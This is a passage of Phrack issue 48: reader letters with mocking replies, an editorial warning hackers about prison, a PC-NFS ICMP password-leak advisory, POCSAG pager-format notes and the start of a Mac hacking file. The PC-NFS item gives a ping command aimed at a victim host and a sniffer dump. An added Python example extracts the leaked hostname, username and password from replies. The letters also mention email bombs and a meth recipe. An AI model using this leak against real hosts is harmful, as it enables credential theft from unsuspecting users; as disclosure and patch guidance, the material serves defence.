need a flat fee. I suggest you look at a SUPERB site:
http://www.peepshow.com 


That place has a flat fee, all you can eat pricing structure, the way 


God meant it to be. Take note, and follow suit. ]


I have a Mitsubishi MT9 (MT-1097FOR6A) ..I program the NAM with the
passw: 2697435 ...I need the passw to have access to SCAN or TAC
function ...please, help me!
Thank
Regards
NCG


[ I'm not familiar with that phone, but I'd start off looking through
Dr. Who's archive of cellular info at:
http://www.l0pht.com/radiophone


If what you are looking for isn’t there, there might be a link to 
somewhere that has it. ] 


my name is azreal! I am also known as the angel of death. why did you sell
out to the feds back when you were running comsec. i think phiber optik was a
great guy and i would have been glad to work with a legend. do you know his
e-mail address

azreal 


[ Azrael? The Angel of Death? I thought Azrael was Gargamel’s annoying cat. 


But to answer your question, I sold out to the man ages ago for money. 
Pure and simple. Once you hit puberty, you might have a need for cash. 
Once mommie sends you off to college, you might need it even more. And 
in the distant future, when you get out on your own, you will really 
know. 


Yes, phiber is swell. There have been good pictures of him in many 
national magazines. Try not to get the pages stuck together. 
And, yes, I do know his email address. Thanks for asking! ] 


From: prodigy.com (MR MARK P DOLESH) 


How do you hack? 


[ Very carefully. ] 


Did you ever write a edition that deals with breaking the screensavers
code? If so which one? How about breaking the Win95 password. You know
the one that allows you into Win95?


[ We pass all articles about breaking Windows Screen Savers on to 
the more technical forum at 2600 magazine.


To disable the Win95 password, install Linux. ] 


A phriend of mine showed me your site a few days ago at his house...I
thought it was pretty cool. I dloaded a few issues and stuff to check
out...I haven't been on the internet too long so I'm still trying to phined
more stuff that interest me, and I would like to set up my own page like
that but my account is thru the school...Is there anyway around that? So
it can be like border line legal? How underground can one go??? If you
still have the file on where the line is please send them...Thanks.


[ Your account is through your school, but you are looking for a way around 
that? Hmmm...let me see. I’m just going to throw out something wild 
and crazy, but, what the hell: Maybe, get another account through 
another Internet provider? I know, it’s just too outlandish. Forgive 
me for being so zany. 


How underground can you really go? I used to have that file you are looking 
for, but I was so underground at the time, it got soiled with mud and 
disintegrated, eventually polluting the water table, and was ultimately 
drank by the city of Pasadena, Texas. ] 


In regards to volume one, issue four, Phile #8 of 11
This shit has got to be a joke, I tried to make some and
Was a great disappointment ????


[ The meth recipe works just fine. Obviously you DIDN’T try to make it. 
If you feel like a REAL MORON, look at the cat recipe in the line noise 
section of this issue. Stay up for a week, go into deep amphetamine 
psychosis and die! Woo Woo! ] 


I've tried to locate these guys who have a Black book for cracking
passwords in major software and some games as well. They go by the names
of Jolly Reaper and Maugan Ra aka Manix. I am doc X from London (not a
pig!!!) if U happen to know these doodez let us know. TA from GB


[ Perhaps you have Phrack confused with something having to do with 
pirated software. I’d ask that question in a posting to the USENET 
group alt.warez or on the IRC #warez channels. ] 


Erie, 
i have been searching the internet for some kind of script that 
will subscribe a certain email address to a shitload of 
mailing lists...i have heard of such a thing. 
what im lacking is that keyword to search for such as: 


bombard 
attack 
flash 


what is the technical term for this kind of attack? 

or better yet, do you know where to get a hold of such a script. 

im not familiar with mailing lists and id rather not spend the time 
researching the topic...but i need vengeance quickly :-) 


any help appreciated, 
-roger 


[ The name for this type of attack? Uh, an email bomb? 
But let's take a closer look at your mail:


"id rather not spend the time researching the topic...but I need vengeance
quickly"


I'm not going to be your fucking research assistant, or your accomplice.
If you can't figure out how to look through our back issues to find any of
the tons of fake mailers we've printed, or figure out how to automate them
using shell script, then you don't deserve to live, much less get your
speedy vengeance.


Couldn’t you even come up with a NON-LAME way to get back at someone? Hell, 
even rewriting their .login to say "exit" or something silly like that is 
more clever, and less cliche, than flooding their inbox. ] 


The art of " information manipulation " has possessed my virgin soul ! I 
turned into a fuckin’ 2-year old (drool and all) when experiencing the free 
local call system involving a paperclip . All I’ve been thinking is hack, 
haCK, HACK ! I’m still drenched behind the ears but I’m a patient, turbo 
learner (whatever the hell that means) ! 


Here’s the problem: I possess some info that could make you smile so 
big, that your sphinctor would unwrinkle. I would like to experiment, if you 
will . Perhaps, dabble with this stuff , but I am very uneducated in raping 
mainframes. This could be a major wood producer 
because my EX works at this establishment 


I need a trustworthy pro who possesses a plethora of tasty tactics. Which
way to the Dagobah System..... I seek YODA !!


[ Drooling 2-year old. 


Very uneducated in raping mainframes. 


Major wood producer. 


Well, gee, I’m sure your info would make my "sphinctor" unwrinkle, but I’m 
wearing a new pair of jeans, so I guess I'll have to take a rain check.


God bless AOL for bringing the internet to the masses! ] 


i want to be added to your list. and could you send me unzipped hacking
software or can you tell me how to unzip software and a beginners guide
to hacking. i would appreciate it i want to begin fun new field of
hacking thank you


[ You want to learn all about hacking, but you don’t know how to unzip 
files? 


Crawl before you run, Kwai Chang. ] 


WALLS HAVE EARS (Vách có tai)


Mr. Tám went on a long trip and stayed at a hotel. For several hours he
could not sleep because of the noisy laughing and talking coming through
from the room next door. Clearly they were playing cards, gambling hard
against each other for big stakes.


He tried to put up with it until 3 in the morning and was still tossing and
turning; Tám could not stand it any longer, so he tapped lightly on the wall
to give the next room a gentle hint.


The moment Tám finished knocking, he heard a tenor voice yell from the room
next door:


- Good heavens! Do you know what time in the morning it is? And there you
are hammering nails to hang up pictures!

[Uh, let’s see...No Boom Boom with soul brother. Soul Brother too beaucoup. 


Ddi Ma’o.] 


Hello, I would like to have a lot of information about what you do, and
above all about how you do it. That is, send me information on the secrets
of the operating systems of the internet, everything you can send me.
I am a university student, and I like everything related to networks.


Many greetings.
Answer me.


[ What is this, International Day? 


If you want a lot of information, READ A LOT OF BOOKS! MY GOD! I am not
the master of the world! Ehehe, that was only a joke. There are no books
in Spanish on <<computer security>>. What a pity.


If you want to learn, start with English...then go buy the entire O'Reilly
Yellow series and Blue series. That will get you started learning
"the secrets of the operating systems of the internet." ]


From: "Erik K. Escobar" 
Subject: Apology 


This letter is to be forwarded to the newsgroup io.general by madmagic, in
care of Mr. Escobar.


I would like to send a public apology to Internex Online for the 
treatment I have given the staff and users of this system. I threw 
around some threats and words that can incriminate me, and realized that 
it was a stupid idea on my behalf. In the last week or so with the 
negative attention I have gotten, I got to know the IO/ICAN staff a bit 
better and everything in good standing. Me and Internex Online are now 
even and there will be no retaliation or sour words from me. I just want 
everything to go back to the norm. 


Erik 


[ * AND THEN * ] 


From: "Erik K. Escobar" 
Subject: Shit 


As my understanding, A letter of apology under my name was redistributed 
around within my mailing list and whatever. As some of you know, myself 
and Zencor have been having problems with Internex in the past and near 
the middle of this week, I got into a large battle with was ACC, ICAN, 
and Internex Online -vs- Me. It is stupid to get into an argument with 
that many corporations, and a few words and threats were thrown, they 
locked my account. I wrote a letter in response of that and they 
proceeded to lock other Zencor staff accounts and hack our web site. Also
they posted the letter in the news groups and whatever. They eventually
decided to charge me and whatever, and to save me time outta the courts
and crap like that I made an apology for the threats, seeing that they
could incriminate me. Internex has done wrong and I probably won't be
seeing a lot of apologies coming my way. If they didn't have certain info
about me..they could have me very well laughing at them but that is not
the case.


Erik 
Lord Kaotik 
[ ZENCOR TECHNOLOGIES ] 


[ Can you say, LAME? ] 


Been trying to locate for some time the file, plusmap.txt that used to be on 
the phrack bbs (716-871-1915). This file outlined information regarding the 
videopal in the videocipher II plus satellite decoder module. Any idea where 
I might find this file? 


[ I didn’t know there was a "phrack" bbs. <Sigh> 


In any case, I would look for information regarding this on the following 
sites: 


http://www.scramblingnews.com 
http://www.hackerscatalog.com 
http://ireland.iol.ie/~kooltek/welcome.html 


Satellite Watch BBS : 517-685-2451 


This ought to get you in the right direction. ] 


Hi, 


Just a quick note to tell you about the Hawaii Education Literacy Project - 
a non-profit organization - and our efforts to promote literacy by making 
electronic text easier and more enjoyable to read. Given that we’re both in 
the reading biz, I thought you might be interested. 


ReadToMe, our first program, reads aloud any form of electronic text, 
including Web pages, and is free to anyone who wishes to use it. 


The "Web Designers" section of our home page tells you how your pages can 
literally speak to your audience. Actually, all you need to do to make your 
pages audible is to add the following html code: 


<P><A HREF="http://www.pixi.com/~readerl/readweb.bok">Hear
This Page!</A> Requires ReadToMe Software... Don't got it? <A
HREF="http://www.pixi.com/~readerl">GET IT FREE!</A>
</P>


A beta test version of the program can be obtained from
http://www.pixi.com/~readerl. I encourage you and your readers to download
a copy and take it for a spin.


Thank you for your time, 
Rob Hanson 


rhanson@freeway.net 
Hawaii Education Literacy Project 
[ Honestly, I don't know if this is a spam to a list of magazine people, or
really a phrack reader. I have this thing about junk email, and the joy of
offering that info to our thousands of bored hacker readers looking for
an excuse to fuck with some system.


I'll let them decide if this was a spam. Thanks, Rob. ]


********************************


SYNTHETIC PLEASURES opens in the US theaters 


********************************


save the date, spread the word. forgive us if you got this before. 


eerily memorable is SYNTHETIC PLEASURES, a trippy, provocative tour through 
the perfectly artificial worlds of cyberspace, plastic surgery, 
mind-altering chemicals and controlled, man-made environments that 
questions whether the natural world is redundant, or even necessary. those 
who see it will want to pinch themselves when it’s over. 

(janet maslin- The New York Times) 


for further info contact: 
caipirinha@caipirinha.com 
http://www.syntheticpleasures.com 


first opening dates:


Aug 29 Los Angeles, CA- Nuart Theatre
Aug 30 San Francisco, CA- Castro Theatre
Aug 30 Berkeley, CA- UC Theatre
Aug 30 San Jose, CA- Towne Theatre
Aug 30 Palo Alto, CA- Aquarius Theatre
Aug 30 Portland, OR- Cinema 21
Sept 13 San Diego, CA- Ken Theatre
Sept 13 NYC, NY- Cinema Village
Sept 13 NYC, NY- City Cinemas
Sept 13 Larkspur, CA- Larkspur Theatre
Sept 20 Boston, MA- Kendall Square Theater
Sept 20 Cleveland, OH- Cedar Lee
Sept 20 Philadelphia, PA- Ritz
Sept 22 Voorhees, NJ- Ritz 12
Sept 27 Austin, TX- Dobie Theater
Sept 27 New Haven, CT- York Theatre
Sept 27 Pittsburgh, PA- Rex
Oct 4 Washington, DC- Key Cinema
Oct 11 Providence, RI- Avon Theater
Oct 11 Kansas City, MO- Tivoli
Oct 11 Baltimore, MD- Charles Theatre
Oct 18 Waterville, MA- Railroad Square
Oct 18 Durham, NC- Carolina Theater
Oct 18 Raleigh, NC- Colony Theater
Oct 18 Chapel Hill, NC- The Chelsea Theatre
Oct 25 Seattle, WA- Varsity
Nov 8 Ft Lauderdale, FL- Fox Sunrise
Nov 15 Gainesville, FL- Plaza Theater
Nov 16 Hanover, NH- Dartmouth Theater
Nov 22 Miami, FL- Alliance
Nov 25,29,30 Tampa, FL- Tampa Theatre
Dec 13 Chicago, IL- Music Box


[ THIS WAS DEFINITELY A SPAM.


I wonder what lovely cgi-bin holes that WWW site is sporting, like
MGM got for the "Hackers" WWW page. Oh man, what a dilemma.
To hack, or not to hack. Assholes. ]


==Phrack Magazine== 
Volume Seven, Issue Forty-Eight, File 2a of 18 
Phrack Editorial 
by 
Erik Bloodaxe 


shrunk considerably. With the incredibly low prices of powerful personal
computers, and the free availablity of complex operating systems, the need 
to break into remote systems in order to learn has been removed. The only 
possible needs being met by remote intrusions would be a means to gather 
specific information to be sold, or that base psychological rush from doing 
something forbidden and getting away with it. Chasing any high only leads
to a serious crash, and in the case of breaking into computers, that
only leads to jail.


There is absolutely nothing cool about going to jail. I know too many
people who are currently in jail, who have been in jail, and some who are
on their way to jail. Trust me on this, people. You will not be
respected by anyone if you act rashly, do something careless and
end up being convicted of several felonies. In fact, all of your "friends,"
(those who didn't get busted along with you, and turn state's evidence against
you) will just think you were a moron for being so sloppy...until they also
get nailed.


Get raided and you will almost certainly spend time in jail. Even once you
are released, you will lose your passport and your ability to travel freely,
you will lose your ability to do business in classified environments, you
will become unemployable by most companies, you may even lose your rights to
use computer or networking equipment for years. Is it still worth it?


I break into computers for a living, and I love my job. However, I don’t 
kid myself about just how lucky I really am. Don’t fool yourselves into 
thinking that it was easy for me to achieve this, or that anyone else can 
easily slip into such a role. Staking out a claim in the information security 
industry is a continual battle for a hacker. Your past will constantly
stand in your way, especially if you try to hide it and lie to everyone.
(Read the recent Forbes ASAP article and spot the hacker from Garrison
Associates lying about his past, although he was raided for running
the Scantronics Publications BBS in San Diego just a few short years ago.
Shame on you Kludge.)


I’ve never lied about anything, so that can’t be held over my head. I’ve 
never been convicted of anything either, although I came closer to jail 
than hopefully any of you will ever experience. The ONLY reason I avoided 
prison was the fact that law enforcement was not prepared to deal with 
that type of crime. Now, I’ve taught many of those same law enforcement 
agencies about the nature of computer crimes. They are all learning and 
not making the same mistakes any more. 


At the same time, the technology to protect against intrusions has increased 
dramatically. Technology now exists that will not only stop attacks, but 
identify the attack methodology, the location of the attacker, and take 
appropriate countermeasures all in real-time. The company I work for makes it. 
I've always said that anything that can stop me will stop almost anyone,
even though I'm not anywhere close to the world's best. There simply
aren't that many things to monitor, once you know what to look for.


The rewards have diminished and the risks have increased. 


Hacking is not about crime. You don't need to be a criminal to be a hacker.
Hanging out with hackers doesn't make you a hacker any more than hanging
out in a hospital makes you a doctor. Wearing the t-shirt doesn't
increase your intelligence or social standing. Being cool doesn't mean
treating everyone like shit, or pretending that you know more than everyone
around you.


Of course, I’m just a bitter old sell-out living in the past, so 
what do I know? 


Well, what I do know, is that even though I'm one of the few screaming about
how fucked up and un-fun everything has become, I'm not alone in my disgust.
There are a bunch of us who have reached the conclusion that the "scene"
is not worth supporting; that the cons are not worth attending; that the
new influx of would-be hackers is not worth mentoring. Maybe a lot of us
have finally grown up.


In response, expect a great many to suddenly disappear from the cons. We'll be
doing our own thing, drinking a few cool drinks someplace warm, and reflecting
on the collective pasts we've all drawn from, and how the lack of that
developmental stage has ruined the newer generations. So those of us
with that shared frame of reference will continue to meet, enjoy each
other's company, swap stock tips in the same breath as operating system
flaws, and dream about the future of security.


You're probably not invited.


Line Noise
Part I


PC-NFS Bug

I have found a nice little security hole in PC-NFS version 5.x. If you
ping a PC-NFS user with a packet size of between 1450 to 1480, the
PC's ICMP reply packet will divulge:


    The hostname of the PC
    The hostname of the PC's authentication server
    The username of the person logged in
    The password for the user (Thank you very much!)


All of this information is in clear text unless PC-NFS’s NETLOGIN is 
used. NETLOGIN uses XOR as its encryption, so this is hardly secure 
either. 


NDIS, ODI, 3C503 drivers on SMC and 3C503 cards have been tested
and all freely return the above information on both PC-NFS versions
5.0 and 5.1a. This should work with other driver/NIC configurations
also.


You get the occasional added bonus of locking up the victim's PC as
well!


This bug was new to Sun and they have created a new PCNFS.SYS
driver for us. They have labeled it PC-NFS.SYS version 5.1a.DOD.
This new version fills reply ICMP packets with nulls after 200 bytes of
the requested pattern.


Until you receive this patch from Sun, I would recommend setting all
external router interface MTUs to a value of no greater than 1350, as this
is the point where secrets are contained in the return packet.


The Unix command to generate the below results is as follows: 


ping -s -c1 pchost.victim.com 1480


Use your favorite sniffer to filter ICMP packets and you have it. If you 
don’t have a sniffer, try the -v(erbose) option of ping and convert the 
hex to ascii starting around byte 1382. 


Sniffer output follows: 


19:03:48.81
ip: evil.com->pchost.victim.com
icmp: echo request
  62: 024 025 026 027 030 031 032 033 034 035
  72: 036 037       !   "   #   $   %   &   '
  82:   (   )   *   +   ,   -   .   /   0   1
  92:   2   3   4   5   6   7   8   9   :   ;
 102:   <   =   >   ?   @   A   B   C   D   E
 ...
1472: 226 227 230 231 232 233 234 235 236 237
1482: 240 241 242 243 244 245 246 247 250 251


19:03:48.85
ip: pchost.victim.com->evil.com
icmp: echo reply
  62: 024 025 026 027 030 031 032 033 034 035
  72: 036 037       !   "   #   $   %   &   '
  82:   (   )   *   +   ,   -   .   /   0   1
  92:   2   3   4   5   6   7   8   9   :   ;
 102:   <   =   >   ?   @   A   B   C   D   E
 112:   F   G   H   I   J   K   L   M   N   O
 122:   P   Q   R   S   T   U   V   W   X   Y
 132:   Z   [   \   ]   ^   _   `   a   b   c
 142:   d   e   f   g   h   i   j   k   l   m
 152:   n   o   p   q   r   s   t   u   v   w
 162:   x   y   z   {   |   }   ~ 177 200 201
 172: 202 203 204 205 206 207 210 211 212 213
 182: 214 215 216 217 220 221 222 223 224 225
 192: 226 227 230 231 232 233 234 235 236 237
 202: 240 241 242 243 244 245 246 247 250 251
 212: 252 253 254 255 256 257 260 261 262 263
 222: 264 265 266 267 270 271 272 273 274 275
 232: 276 277 300 301 302 303 304 305 306 307
 242: 310 311 312 313 314 315 316 317 320 321
 252: 322 323 324 325 000 000 324 005   ?   $
 262:   : 004 000 000 000 000 000 000 000 000
 272: 036 006   W   V   P   S   Q   R 016 007
 ... (bytes 282 through 1361: the requested pattern stops here and the PC
      echoes its own memory instead; this stretch of the dump did not
      survive extraction and is omitted) ...
1362:   { 255 023 000 242 265 015 000 002 000
1372: 000 000   S 017 005 000   C 003 000 000
1382:   p   c   h   o   s   t 000 000 000 000
1392: 000 000 000 000 000 000 244   A   @ 001
1402:   s   e   r   v   e   r   1 000 000 000
1412: 000 000 000 000 000 000 244   A   @ 001
1422: 000 000 000 000 000 000 000 000 000 000
1432: 000 000 000 000 000 000 244   A   @ 001
1442:   u   s   e   r   n   a   m   e 000 000
1452:   p   a   s   s   w   d 000 000 000 000
1462: 000 000 000 000 000 000 000 000 000 000
1472: 000 000 000 000 000 000 000 000 000 000
1482: 000 000 200 000   k 000 260 271 377 377
1492: 344 275   9 212


The names have been changed to protect the innocent, but the rest is actual. 


Byte 1382: PC's hostname
Byte 1402: PC's authentication server hostname
Byte 1442: The user's account name. Shows nobody if logged out.
Byte 1452: The user's password.
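

The dump above is read by eye. What follows is an added example, not code from
the author of this item: it takes an already captured echo reply as a byte
string, pulls the four leaked fields out at the offsets listed above, and tells
a reply from an unpatched driver apart from one produced by Sun's 5.1a.DOD
driver (200 bytes of pattern, then NULs) and from a normal stack that mirrors
the whole request. It assumes the sniffer's byte numbers count from the start
of an Ethernet frame with 14 + 20 + 8 bytes of headers before the echo data,
assumes the slot lengths between the fields, and builds its sample reply to
look like the dump rather than from a real capture.

```python
"""PC-NFS echo-reply checker (added example, not from the Phrack item).

Offsets are counted the way the sniffer output counts them, from the start of
the captured frame.  ASSUMPTION: 14 bytes Ethernet + 20 bytes IPv4 (no options)
+ 8 bytes ICMP echo header precede the echo data.  The slot lengths and the
sample reply below are assumptions/constructions that match the dump.
"""

FRAME_HDR_LEN = 14 + 20 + 8          # assumed header bytes before the echo data
PATCHED_PATTERN_BYTES = 200          # 5.1a.DOD echoes this much, then NULs

# field -> (frame offset from the dump, assumed slot length up to the next field)
LEAKED_FIELDS = {
    "hostname":    (1382, 20),
    "auth_server": (1402, 40),
    "username":    (1442, 10),
    "password":    (1452, 30),
}


def ping_pattern(data_len=1480):
    """Echo-request data as the dump shows it: data byte i carries i & 0xff
    (frame byte 62 is 024 octal, i.e. data byte 20 holds the value 20)."""
    return bytes(i & 0xFF for i in range(data_len))


def cstring(buf, offset, slot_len):
    """NUL-terminated ASCII field occupying a fixed slot at a frame offset."""
    slot = buf[offset:offset + slot_len]
    end = slot.find(b"\x00")
    return (slot if end < 0 else slot[:end]).decode("ascii", "replace")


def extract_fields(reply_frame):
    """Hostname, authentication server, user name and password from a reply frame."""
    return {name: cstring(reply_frame, off, size)
            for name, (off, size) in LEAKED_FIELDS.items()}


def classify_reply(reply_frame, request_data):
    """'full-echo': the reply mirrors the whole request (a normal IP stack)
       'patched'  : pattern for 200 bytes, then nothing but NULs (5.1a.DOD)
       'leaking'  : the pattern breaks off and other memory follows (PC-NFS 5.x)"""
    data = reply_frame[FRAME_HDR_LEN:FRAME_HDR_LEN + len(request_data)]
    if data == request_data:
        return "full-echo"
    head, tail = data[:PATCHED_PATTERN_BYTES], data[PATCHED_PATTERN_BYTES:]
    if head == request_data[:PATCHED_PATTERN_BYTES] and not tail.strip(b"\x00"):
        return "patched"
    return "leaking"


def sample_vulnerable_reply(request_data):
    """CONSTRUCTED frame shaped like the dump: pattern echoed up to data byte 213
    (frame byte 255), the leaked bytes that follow it in the dump, zeros
    elsewhere, and the four fields at the offsets listed after the dump."""
    frame = bytearray(FRAME_HDR_LEN + len(request_data))   # dummy all-zero headers
    echoed = 214
    frame[FRAME_HDR_LEN:FRAME_HDR_LEN + echoed] = request_data[:echoed]
    leak = b"\x00\x00\xd4\x05?$:\x04"        # dump: 000 000 324 005 ? $ : 004
    frame[FRAME_HDR_LEN + echoed:FRAME_HDR_LEN + echoed + len(leak)] = leak
    for name, value in (("hostname", b"pchost"), ("auth_server", b"server1"),
                        ("username", b"username"), ("password", b"passwd")):
        off = LEAKED_FIELDS[name][0]
        frame[off:off + len(value)] = value
    return bytes(frame)


if __name__ == "__main__":
    req = ping_pattern()
    reply = sample_vulnerable_reply(req)
    print(classify_reply(reply, req), extract_fields(reply))
```

Run it against a real capture by replacing the constructed frame with the bytes
of the reply as your sniffer wrote them out. A "patched" verdict on a 1480-byte
probe is the check to run after installing the Sun driver; a "leaking" verdict
with a non-empty password field is the condition the 1350 MTU workaround is
meant to hide from the outside.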


POCSAG paging format, code and code capacity 


The POCSAG (Post Office Code Standardization Advisory Group) code is a
synchronous paging format that allows pages to be transmitted in a SINGLE-BATCH
structure. The POCSAG code provides improved battery-saving capability and an
increased code capacity.

The POCSAG code format consists of a preamble and one or more batches of
codewords. Each batch comprises a 32-bit frame synchronization code and eight
64-bit address frames of two 32-bit addresses or idle codewords each. The
frame synchronization code marks the start of the batch of codewords.


-PREAMBLE STRUCTURE
The preamble consists of 576 bits of an alternating 101010 pattern transmitted 
at a bit rate of 512 or 1200 bps. The decoder uses the preamble both to 
determine if the data received is a POCSAG signal and for synchronization with 
the stream of data. 


              Preamble           First batch               Subsequent batches
  paging      576 bits of    |FS|F0|F1|F2|F3|F4|F5|F6|F7|  |FS|F0|F1|...|F7| ...
  format      bit reversals
              (101010...)
                                    1 FRAME = 2 CODEWORDS

              Preamble     Batch
  512 bps     1125 ms      1062.5 ms
  1200 bps    480 ms       453.3 ms

Codeword structure

  BIT NUMBER      1   2-19          20,21                    22-31              32
  ADDRESS FORMAT  0   Address bits  Source identifier bits   Parity check bits  Even parity
  MESSAGE FORMAT  1   Message bits (bits 2-21)               Parity check bits  Even parity


-BATCH STRUCTURE
A batch consists of a frame synchronization code followed by 8 frames of two
address codewords per frame (16 address codewords per batch). In order to
maintain the proper batch structure, each frame is filled with two address
codewords, or two idle codewords, or two message codewords, or any appropriate
combination of the three codeword types.


-FRAME SYNCHRONIZATION CODE STRUCTURE 
The frame synchronization (FS) code is a unique, reserved word that is used to 
identify the beginning of each batch. The FS code comprises the 32 bits: 


01111100110100100001010111011000 


-OPTIONAL ALTERNATE FRAME SYNCHRONIZATION CODEWORDS 

An alternate frame synchronization (AFS) code can be selected to support special 
systems or systems that require increased coding capability. The AFS is 
generated in the same manner as an address codeword (i.e., a BCH codeword with 
parity bits). The POCSAG signaling standard has reserved special codewords for 
the AFS from 2,000,000 to 2,097,151. The use of the AFS requires the paging 
system to support it. The AFS will change to frame 0 on the programmer 
since no frame information is included in the AFS. The AFS should use 
Address 1 so that bits 20 and 21 are 0. 


-ADDRESS CODEWORD STRUCTURE 
An address codeword's first bit (bit 1) is always a zero. Bits 2 through 19 are 
the address bits. The pager looks at these bits to find its own unique 
address. Each POCSAG codeword is capable of providing address information for 
four different paging sources (Address 1 to 4). These addresses are determined 
by the combination of values of bits 20 and 21 (the source-identifier bits). 
Bits 22 through 31 are the parity check bits, and bit 32 is the even parity bit. 


              BIT 20   BIT 21 
  Address 1     0        0 
  Address 2     0        1 
  Address 3     1        0 
  Address 4     1        1 


Pre-coded into the code plug are three bits which designate the frame location, 
within each batch, at which the pager’s address is to be received; the decoder 
will look at the codewords in this frame for its address. 

Power is removed from the receiver during all frames other than the precoded 
one, thus extending pager battery life. 


-CODE CAPACITY 

The combination of the code plug's three pre-coded frame location bits and the 
address codeword's 18 address bits provides over two million different 
assignable codes. In this combination, the frame location bits are the 
least-significant bits, and the address bits are the most-significant bits. 


-MESSAGE CODEWORD STRUCTURE 
A message codeword always starts with a 1 in bit 1 and always follows 
directly after the address. Each message codeword replaces an address codeword 
in the batch. 


-IDLE CODEWORD STRUCTURE 
The idle codeword is a unique, reserved codeword used to take the place of an 
address in any frame that would not otherwise be filled with 64 bits. 


Thus, if a frame contains only one address, the frame is padded with an idle 
codeword. The idle codeword comprises the 32 bits: 


01111010100010011100000110010111 
-POCSAG CHARACTERS 


  CHAR  HEX      CHAR  HEX      CHAR  HEX 
   #    23        $    24        @    40 
   [    5B        \    5C        ]    5D 
   ^    5E        _    5F        `    60 
   {    7B        |    7C        }    7D 
   ~    7E       DEL   7F        SP   20 
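To make the codeword layout above concrete, here is an added example (not part 
of the Phrack article) that builds and checks POCSAG codewords in Python. It 
assumes the standard POCSAG BCH(31,21) generator polynomial 
x^10 + x^9 + x^8 + x^6 + x^5 + x^3 + 1 (0x769), which the text does not state. 
The FS code (0x7CD215D8) and the idle codeword (0x7A89C197) are the 32-bit 
values given in the text, and the module verifies that both are themselves 
valid BCH codewords with even parity. It also shows how the 18 address bits and 
the 3-bit frame location combine into one 21-bit receiver code, reproduces the 
preamble/batch timing table, and decodes a batch that is constructed here; the 
receiver code 1234567 and message payload are arbitrary placeholders. 

```python
# Added example (not from the article): POCSAG codeword encoder/decoder.
# Assumption: standard POCSAG BCH(31,21) generator x^10+x^9+x^8+x^6+x^5+x^3+1.
GENERATOR = 0x769
SYNC_CODEWORD = 0x7CD215D8   # frame synchronization code from the text
IDLE_CODEWORD = 0x7A89C197   # idle codeword from the text
PREAMBLE_BITS = 576          # 1010... bit reversals
BATCH_BITS = 32 + 8 * 64     # FS code + 8 frames of 2 codewords


def bch_parity(data21):
    """10 BCH check bits (codeword bits 22-31) for 21 data bits (bits 1-21)."""
    reg = data21 << 10                    # append ten zero bits
    for shift in range(30, 9, -1):        # polynomial division in GF(2)
        if reg & (1 << shift):
            reg ^= GENERATOR << (shift - 10)
    return reg & 0x3FF


def encode_codeword(data21):
    """21 data bits -> 32-bit codeword: data, BCH parity, then even-parity bit."""
    word31 = (data21 << 10) | bch_parity(data21)
    return (word31 << 1) | (bin(word31).count("1") & 1)


def is_valid_codeword(cw):
    """True when the BCH check bits match and the whole word has even parity."""
    return (bch_parity(cw >> 11) == ((cw >> 1) & 0x3FF)
            and bin(cw).count("1") % 2 == 0)


def correct_codeword(cw):
    """Return cw, or cw with a single flipped bit repaired, or None."""
    if is_valid_codeword(cw):
        return cw
    for bit in range(32):
        if is_valid_codeword(cw ^ (1 << bit)):
            return cw ^ (1 << bit)
    return None


def split_ric(ric21):
    """21-bit receiver code -> (18 address bits, 3-bit frame location)."""
    return ric21 >> 3, ric21 & 0b111


def address_codeword(address18, source):
    """Address codeword: bit 1 = 0, bits 2-19 address, bits 20-21 source id."""
    return encode_codeword(((address18 & 0x3FFFF) << 2) | (source & 0b11))


def message_codeword(payload20):
    """Message codeword: bit 1 = 1, bits 2-21 message bits."""
    return encode_codeword((1 << 20) | (payload20 & 0xFFFFF))


def decode_batch(words):
    """Parse FS code + 16 codewords; the frame number comes from the slot."""
    if len(words) != 17 or words[0] != SYNC_CODEWORD:
        raise ValueError("batch must start with the FS code")
    records = []
    for slot, cw in enumerate(words[1:]):
        frame = slot // 2
        fixed = correct_codeword(cw)
        if fixed is None:
            records.append({"frame": frame, "type": "uncorrectable"})
        elif fixed == IDLE_CODEWORD:
            records.append({"frame": frame, "type": "idle"})
        elif fixed >> 31 == 0:
            address18 = (fixed >> 13) & 0x3FFFF
            records.append({"frame": frame, "type": "address",
                            "ric": (address18 << 3) | frame,
                            "source": (fixed >> 11) & 0b11})
        else:
            records.append({"frame": frame, "type": "message",
                            "payload": (fixed >> 11) & 0xFFFFF})
    return records


def preamble_ms(bps):
    return PREAMBLE_BITS * 1000 / bps


def batch_ms(bps):
    return BATCH_BITS * 1000 / bps


def build_example_batch(ric21=1234567, payload20=0xABCDE):
    """Constructed sample: one address plus one message in the pager's frame."""
    address18, frame = split_ric(ric21)
    words = [SYNC_CODEWORD] + [IDLE_CODEWORD] * 16
    words[1 + 2 * frame] = address_codeword(address18, 0)   # Address 1
    words[2 + 2 * frame] = message_codeword(payload20)
    words[2 + 2 * frame] ^= 1 << 7                          # simulate one bit error
    return words


if __name__ == "__main__":
    print("FS and idle words valid:",
          is_valid_codeword(SYNC_CODEWORD), is_valid_codeword(IDLE_CODEWORD))
    for bps in (512, 1200):
        print(f"{bps} bps: preamble {preamble_ms(bps):.1f} mS, batch {batch_ms(bps):.1f} mS")
    for rec in decode_batch(build_example_batch()):
        if rec["type"] != "idle":
            print(rec)
```

The decoder recovers the frame number from the codeword's position in the 
batch rather than from the codeword itself, which is exactly why the three 
frame location bits need not be transmitted and why a pager can power down its 
receiver during the other seven frames. 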


MACINTOSH HACKING 
by Logik Bomb 


"My fellow astronauts..." 
—Dan Quayle 


Now, two people have mailed Erik Bloodaxe asking about Macintosh 
hacking, particularly war dialers, and each time he insulted Macs and tried 
to get someone to write a file on it. No one has done it. So I guess I have 
to. 


First, some words on Macintoshes. Steve Jobs and Steve Wozniak, the 
originators of the Apple and the Macintosh, were busted for phreaking in 
college. The Apple IIe was used almost universally by hackers. So why has 
the Mac fallen out of favor for hacking? Simple. Because it fell out of 
favor for everything else. Apple screwed up and wouldn’t let clone makers 
license the MacOS. As a result, 80% of personal computers run DOS, and 
Macintoshes are left in the minority. Second, DOS compatible users, and 
hackers in particular, have an image of Mac users as a bunch of whiny 
lamers who paid too much for a computer and as a result are constantly 
defensive. The solution to this impression is to not be an asshole. I know 
it drives every Mac user crazy when he reads some article about Windows 
95’s brand new, advanced features such as "plug-and-play" that the 
Macintosh has had since 1984. But just try and take it. If it’s any 
consolation, a lot of IBM-compatible (a huge misnomer, by the way) users 
hate Windows too. 

Now, on with the software. 


Assault Dialer 1.5 

Assault Dialer, by Crush Commando, is the premier Mac war dialer, 
the Mac’s answer to ToneLoc. It has an ugly interface, but it’s the best we 
have right now. It is the successor to a previous war dialer known as Holy 
War Dialer 2.0. The only real competitor I’ve heard of for Assault Dialer 
is Tyrxis Shockwave 2.0, but the only version I could get a hold of was 
